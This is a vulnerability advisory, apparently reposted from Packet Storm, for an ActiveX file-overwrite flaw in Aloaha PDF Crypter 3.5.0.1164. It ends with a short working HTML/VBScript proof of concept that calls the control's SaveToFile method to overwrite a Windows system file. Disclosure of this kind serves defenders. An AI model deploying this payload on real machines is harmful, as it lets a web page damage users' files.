Aloaha PDF Crypter version 3.5.0.1164 suffers from an active-x arbitrary file overwrite vulnerability.
7fa8744017306fcb9f8b6287e11861e540f90887c71065266540838aa74a25cd-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
============================================================================================
TITLE:
============================================================================================
Aloaha PDF Crypter (3.5.0.1164) activex arbitrary file overwrite
url: http://www.aloaha.com/
download: http://www.aloaha.com/download/aloaha_crypter.zip
author: shinnai (http://shinnai.altervista.org)
============================================================================================
FILE INFO:
============================================================================================
File: C:\WINDOWS\system32\vbCrypt.dll
InternalName: ebCrypt
OriginalFilename: ebCrypt.DLL
FileVersion: 2.0.0.2087
FileDescription: ebCrypt Main Module
Product: ebCrypt
ProductVersion: 2.0.0.2087
Language: English (United States)
MD5 hash: b262cb93c555c3c9604502d071a783ec
============================================================================================
ACTIVEX INFO:
============================================================================================
ProgID: EbCrypt.eb_c_PRNGenerator.1
GUID: {B1E7505E-BBFD-42BF-98C9-602205A1504C}
Description: eb_c_PRNGenerator Class
Safety report:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
============================================================================================
BUG:
============================================================================================
This activex contains the "SaveToFile" which could be used to overwite arbitrary files on
pc users.
============================================================================================
PROOF OF CONCEPT
============================================================================================
<html>
<object classid='clsid:B1E7505E-BBFD-42BF-98C9-602205A1504C' id='test' ></object>
<script language='vbscript'>
test.SaveToFile "c:\windows\_system.ini"
</script>
</html>
============================================================================================
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (MingW32)
iQIcBAEBAgAGBQJQ/6sFAAoJEJlK/ai8vywmSUUQAK38iSzcZ3JsD+Kskt1Zwvhc
hynADNu17uvlcaUoK7uFc8BwOkRT6XqlmJe6Gab02jPClkmaHRH0Oh8/Zxu8T5Y5
TsLrw7YgUFQDelS4zL7yxZIKofio3GVS55vo3JL1bJvKrANp99BYcQFX4t5539g9
l/kYf51QGhWXxEvYFlSpDZ8km8dCElLYTT47oFjXMFSpBHyodrU4MPh4FGLoN1XN
TLrYDOoTke+RXit/nzNKqbNzXIXmBVTBWfYdPLWwcc07Go4KR3tKGl1ELSCczHeg
PFWCbcJ18l56809afAviUUvrgb1g9WG9ZY5jMxXP1t5oqeeLJKfKhX0KipVtoBUa
dZZWJOLp6Mmi8VBzfkTu50jZy1B4EtUSTlmj5A2SKBQRM/0SSqZO1LjwE39fQ9gh
6avUHhPgV9OLqaWxVbNHy6RYBFYHlo46ytvIhgBDU0VPqwI50yyzrObxbRAhCD19
GjgSBtZqOJQ9sFwiXS+HHQcCt8ZR6pf09yWmxDr+1L7D4yKvq/Z2TsBuYKMUGazW
Xni6lxddI7LUN88LXlrV8cCoJ7R2gBe9Tg3nUBIDLpXM4hyeU1DTL0kFNATUk3P5
7xFde64BvKL2GAzEip8j9PuGhezfflIIhsxPHUEemOvsUctqXEQI8DtC0GkRaT3J
enDko6b3T5jOt6axrWGb
=H+Gh
-----END PGP SIGNATURE-----
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed